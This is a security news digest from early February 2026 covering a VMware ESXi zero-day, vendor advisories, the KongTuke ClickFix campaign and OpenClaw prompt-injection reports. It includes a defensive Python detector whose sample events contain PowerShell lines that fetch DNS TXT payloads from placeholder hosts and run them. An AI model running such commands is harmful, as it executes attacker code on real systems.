The Cybersecurity and Infrastructure Security Agency (CISA) has officially added a critical vulnerability affecting VMware ESXi to its Known Exploited Vulnerabilities (KEV) catalog. Tracked as CVE-2025-22225, this zero-day flaw allows attackers to escape security sandboxes. It is currently being leveraged in…
Microsoft to Integrate Sysmon Threat Detection Natively into Windows 11
Microsoft has officially begun rolling out native System Monitor (Sysmon) functionality to Windows 11, marking a significant shift for threat hunters and security operations centers (SOCs). Released via the Windows 11 Insider Preview Build 26300.7733 (Dev Channel) on February 3,…
Cisco Warns of Meeting Management Flaw Enabling Arbitrary File Upload by Remote Attackers
Cisco has released a security advisory detailing a high-severity vulnerability in Cisco Meeting Management (CMM). The flaw, caused by improper input validation, allows authenticated remote attackers to upload arbitrary files and potentially execute commands with root privileges. The vulnerability is located…
Cyberattackers Exploit DNS TXT Records in ClickFix Script to Execute Malicious PowerShell Commands
A new evolution of the “ClickFix” social engineering campaigns, dubbed KongTuke, has been observed. This latest variant, active since late December 2025, distinguishes itself by using DNS TXT records to stage and retrieve malicious payloads, marking a significant shift in evasion tactics. The “ClickFix” technique…
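The snippet above only names the technique (payload text parked in DNS TXT records, pulled down and run by PowerShell). The following is an added detection example, written for this page and not code from the KongTuke report or any vendor; it assumes the pattern shows up in PowerShell ScriptBlock (4104) or Sysmon process-creation command lines as a TXT lookup (Resolve-DnsName -Type TXT or nslookup -type=txt) combined with an execution sink (iex, Invoke-Expression, .Invoke()) in the same command. The sample events are constructed, and the hostnames under .invalid are placeholders. A TXT lookup on its own is left alone, since mail admins check SPF and DMARC records that way all day.

```python
import re
from typing import List, Tuple

# Constructed sample events (not real telemetry): the command-line field of
# PowerShell ScriptBlock (4104) / Sysmon process-creation (Event ID 1) records.
SAMPLE_EVENTS: List[str] = [
    # 0: TXT lookup, base64 decode, then execution of the result: the staging pattern
    "powershell -w hidden -c \"$r = Resolve-DnsName -Type TXT -Name stage.example.invalid "
    "| Select-Object -ExpandProperty Strings; "
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r -join '')))\"",
    # 1: benign TXT lookup (mail admin checking DMARC), nothing is executed
    "nslookup -type=txt _dmarc.example.com",
    # 2: ordinary admin command, no DNS, no execution sink
    'powershell -c "Get-Process | Sort-Object CPU -Descending"',
    # 3: same staging pattern, keyword split with backticks (i`e`x) to dodge string matching
    'powershell -nop -c "$t = (nslookup -q=txt c.example.invalid)[-1]; i`e`x $t"',
    # 4: benign TXT lookup piped to a formatter only
    "Resolve-DnsName -Name example.com -Type TXT | Format-Table",
]

# A DNS query that can hand TXT record data to the script (input is lowercased first).
TXT_LOOKUP = re.compile(
    r"resolve-dnsname[^|;]*-type\s+txt"
    r"|nslookup[^|;]*-(?:type|q|querytype)=txt"
)
# Sinks that turn a string into running code.
EXEC_SINK = re.compile(
    r"\b(?:iex|invoke-expression|invoke-command)\b"
    r"|\.invoke\(|&\s*\(|\[scriptblock\]::create"
)
# Decoding steps that usually sit between the TXT record and the sink.
DECODE = re.compile(r"frombase64string|-enc(?:odedcommand)?\b")


def normalize(cmd: str) -> str:
    """Fold the cheap obfuscations before matching: backtick-split keywords,
    mixed case and padded whitespace."""
    cmd = cmd.replace("`", "")
    return re.sub(r"\s+", " ", cmd).lower()


def score_command(cmd: str) -> List[str]:
    """Return the indicators present in one command line, in a fixed order."""
    n = normalize(cmd)
    reasons = []
    if TXT_LOOKUP.search(n):
        reasons.append("dns-txt-lookup")
    if EXEC_SINK.search(n):
        reasons.append("exec-sink")
    if DECODE.search(n):
        reasons.append("base64-decode")
    return reasons


def flag_txt_staged_powershell(events: List[str]) -> List[Tuple[int, List[str]]]:
    """Report events where a TXT lookup and an execution sink occur in the same
    command line; a lookup alone is normal admin activity and is not reported."""
    hits = []
    for idx, cmd in enumerate(events):
        reasons = score_command(cmd)
        if "dns-txt-lookup" in reasons and "exec-sink" in reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in flag_txt_staged_powershell(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
        print(f"  {SAMPLE_EVENTS[idx]}")
```

On the constructed sample, events 0 and 3 are flagged and the three benign lines are not. The rule is deliberately a same-command-line heuristic: an actor can split the lookup and the iex across two script blocks, or resolve the record through a .NET DNS client or DNS-over-HTTPS rather than nslookup, so in a real SOC pairing it with Sysmon Event ID 22 (DNS query) and looking for unusual TXT answers from the same process is the stronger signal.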
WatchGuard VPN Client Flaw on Windows Enables SYSTEM‑Level Command Execution
WatchGuard has released a critical security update for its Mobile VPN with IPSec client for Windows to address a privilege escalation vulnerability. The flaw, originating in the underlying software provided by NCP engineering, allows local attackers to execute arbitrary commands…
IT Security News Hourly Summary 2026-02-05 06h : 2 posts
2 posts were published in the last hour:
4:07 : Multiple TP-Link OS Command Injection Vulnerabilities Let Attackers Gain Admin Control of the Device
4:07 : CISA Warns of VMware ESXi 0-day Vulnerability Exploited in Ransomware Attacks
Multiple TP-Link OS Command Injection Vulnerabilities Let Attackers Gain Admin Control of the Device
TP-Link has released urgent firmware updates for its Archer BE230 Wi-Fi 7 routers to address multiple high-severity security flaws. These vulnerabilities could allow authenticated attackers to execute arbitrary operating system (OS) commands, effectively granting them complete administrative control over the…
CISA Warns of VMware ESXi 0-day Vulnerability Exploited in Ransomware Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently confirmed that ransomware groups are actively exploiting CVE-2025-22225, a high-severity VMware ESXi sandbox escape vulnerability. This flaw, patched by Broadcom in March 2025, enables attackers to escape virtual machine isolation and…
ISC Stormcast For Thursday, February 5th, 2026 https://isc.sans.edu/podcastdetail/9796, (Thu, Feb 5th)
This post has no text content; see the original at SANS Internet Storm Center (InfoCON: green).
IT Security News Hourly Summary 2026-02-05 03h : 2 posts
2 posts were published in the last hour:
2:02 : Betterment – 1,435,174 breached accounts
1:09 : Top AI Tools for Red Teaming in 2026
Betterment – 1,435,174 breached accounts
In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to…
Top AI Tools for Red Teaming in 2026
Red teaming has undergone a radical evolution. Modern organizations can no longer rely solely on human creativity or… (Source: Hackread)
From Automation to Infection (Part II): Reverse Shells, Semantic Worms, and Cognitive Rootkits in OpenClaw Skills
In part one, we showed how OpenClaw skills are rapidly becoming a supply-chain delivery channel: third-party “automation” that runs with real system access. This second installment expands the taxonomy with five techniques VirusTotal is actively seeing abused through skills, spanning…
IT Security News Hourly Summary 2026-02-05 00h : 3 posts
3 posts were published in the last hour:
22:55 : IT Security News Daily Summary 2026-02-04
22:36 : CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
22:06 : OpenClaw or Open Door? Prompt Injection Creates AI Backdoors
IT Security News Daily Summary 2026-02-04
144 posts were published on 2026-02-04 (latest first):
22:36 : CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
22:06 : OpenClaw or Open Door? Prompt Injection Creates AI Backdoors
21:32 : What’s new in post-quantum cryptography in RHEL 10.1
…
CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
Ransomware groups are now exploiting VMware ESXi vulnerability CVE-2025-22225, a sandbox escape flaw that Broadcom patched in March 2025; the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed the active exploitation. The vulnerability is an arbitrary write issue…
OpenClaw or Open Door? Prompt Injection Creates AI Backdoors
Zenity researchers show how indirect prompt injection can turn OpenClaw into a persistent AI backdoor without exploiting a software flaw. (Source: eSecurity Planet)
What’s new in post-quantum cryptography in RHEL 10.1
In May 2025, Red Hat Enterprise Linux (RHEL) 10 shipped with the first steps toward post-quantum cryptography (PQC) to protect against attacks by quantum computers, which will make attacks on existing classic cryptographic algorithms such as RSA and elliptic curves…
AWS intruder achieved admin access in under 10 minutes thanks to AI assist, researchers say
LLMs automated most phases of the attack. A digital intruder broke into an AWS cloud environment and in just under 10 minutes went from initial access to administrative privileges, thanks to an AI speed assist.…
IT Gives, Security Takes Away, and Configuration Drift Is the Hidden Cost
There’s an old joke in enterprise tech: IT giveth, and security taketh away. At its best, IT exists to empower people – to give employees faster, better, smarter tools to do their jobs. As we know, no good deed goes…
Ingress-Nginx Vulnerability Enables Code Execution in Kubernetes
An ingress-nginx flaw could allow code execution and access to Kubernetes Secrets. (Source: eSecurity Planet)
Taiwanese operator of Incognito Market sentenced to 30 years over $105M darknet drug ring
Rui-Siang Lin (24), a Taiwanese man, was sentenced to 30 years in prison for running Incognito Market, a major darknet drug site that sold over $105 million in illegal drugs. Incognito Market was a…
Notepad++ Users, You May Have Been Hacked by China
Suspected Chinese state-backed hackers hijacked the Notepad++ update infrastructure to deliver a backdoored version of the popular free source code editor and note-taking app for Windows. (Source: Security Latest)
The ‘Absolute Nightmare’ in Your DMs: OpenClaw Marries Extreme Utility with ‘Unacceptable’ Risk
It is the artificial intelligence (AI) assistant that users love and security experts fear. OpenClaw, the agentic AI platform created by Peter Steinberger, is tearing through the tech world, promising a level of automation that legacy chatbots like ChatGPT can’t…